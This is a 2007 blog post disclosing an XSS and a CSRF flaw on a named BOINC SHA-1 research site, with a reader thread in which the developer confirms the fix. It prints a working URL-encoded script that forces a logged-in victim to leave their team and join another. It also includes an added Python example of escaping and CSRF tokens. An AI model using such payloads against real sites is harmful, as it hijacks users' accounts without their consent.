Thursday, August 23, 2007

SHA-1 Collision Search Graz XSS and CSRF

A couple of days ago, someone at elhacker.net posted a project for finding SHA-1 collisions.
After registering, I found out that there was a "competition" between teams to win credits.
http://boinc.iaik.tugraz.at/sha1_coll_search/top_teams.php

So, after checking out how it worked, I found a CSRF in the forms and an XSS in the team search.

So I made a simple exploit that changes your team to.. BOINC Confederation.

The XSS vuln is here:
http://boinc.iaik.tugraz.at/team_lookup.php?team_name=XSS&search=Search

The CSRF vuln is in all of the forms..

The exploit (for Firefox) is:
http://boinc.iaik.tugraz.at/team_lookup.php?team_name=%3Cscript%3Ewith(new%20XMLHttpRequest()){open(%22GET%22,%22http://boinc.iaik.tugraz.at/team_quit_form.php%22,false);send(null);x=responseText.match(/id%20value=([0-9]*)/)[1];open(%22POST%22,%22http://boinc.iaik.tugraz.at/team_quit_action.php%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22id=%22%2Bx);open(%22POST%22,%22http://boinc.iaik.tugraz.at/team_join_action.php%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22teamid=1%22);}%3C/script%3E&search=Search

Pretty simple :P

So, by "stealing" a user from an important team you can make your team win; the list of the top users is here:
http://boinc.iaik.tugraz.at/top_users.php
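For comparison, here is how the two weak spots look once hardened, as an added example that is not the project's own PHP (written in Python with made-up function names; only the endpoint and parameter names come from the post): the team search reflects team_name HTML-escaped, and the quit/join actions require a per-session token that a request from another site cannot supply.

```python
import hmac
import html
import secrets

# Hypothetical stand-in for the site's session handling: one dict per
# logged-in user, holding an unguessable per-session token.
def new_session(user_id):
    return {"user_id": user_id, "csrf": secrets.token_hex(16)}

def render_team_lookup(team_name):
    """team_lookup.php: reflect the search term as text, not as markup."""
    # html.escape turns < > & " ' into entities, so a <script> payload in
    # team_name is displayed on the page instead of being executed.
    return "<h2>Results for: %s</h2>" % html.escape(team_name, quote=True)

def team_quit_form(session):
    """team_quit_form.php: every state-changing form carries the token."""
    form_html = (
        '<form method="post" action="team_quit_action.php">'
        '<input type="hidden" name="csrf" value="{csrf}">'
        '<input type="hidden" name="id" value="{uid}">'
        "</form>"
    )
    return form_html.format(csrf=session["csrf"], uid=session["user_id"])

def team_action(session, form):
    """team_quit_action.php / team_join_action.php: reject a POST whose
    token is missing or does not match the session's token."""
    submitted = form.get("csrf", "")
    # Constant-time comparison; bytes so non-ASCII input cannot raise.
    if not hmac.compare_digest(submitted.encode(), session["csrf"].encode()):
        return 403, "missing or invalid CSRF token"
    return 200, "ok"

if __name__ == "__main__":
    s = new_session(42)
    print(render_team_lookup("<script>alert(1)</script>"))
    print(team_action(s, {"teamid": "1"}))                     # forged: no token
    print(team_action(s, {"teamid": "1", "csrf": s["csrf"]}))  # genuine form
```

The escaping is the part that actually breaks the chain in the post: the injected script ran on the site's own origin and read the hidden id field, so it could have read a token the same way. The token only stops requests that originate from another site.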

Greetz!!

--EDIT--
The bug has been fixed :) It's good to see that someone actually reads my blog xD

4 comments:

  1. sirdarkcat is evil :)

    Everybody should redirect your IPs to a monitored honeybox for 3-4 days, whenever new content is released...

  2. I think they do, this bug has been patched.. :o!
    My logs (Google Analytics) show that someone reported this post through GMail to the owners of the project..
    Pff, maybe if I use Responsible Disclosure next time, they will give me some extra credits haha

  3. Hi, I'm the official developer of the system. I have subscribed to Google Alerts, and one of them brought me to your blog. Since Google sends alerts to GMail, there was no middleman involved (well, kind of).

    Thanks for finding the bug, but next time it would be better if it wasn't reported publicly :)

  4. OK rytis, sorry for the full disclosure, but since it wasn't so dangerous I disclosed it this way; any new XSS will be reported to you privately :)
    Greetz!!
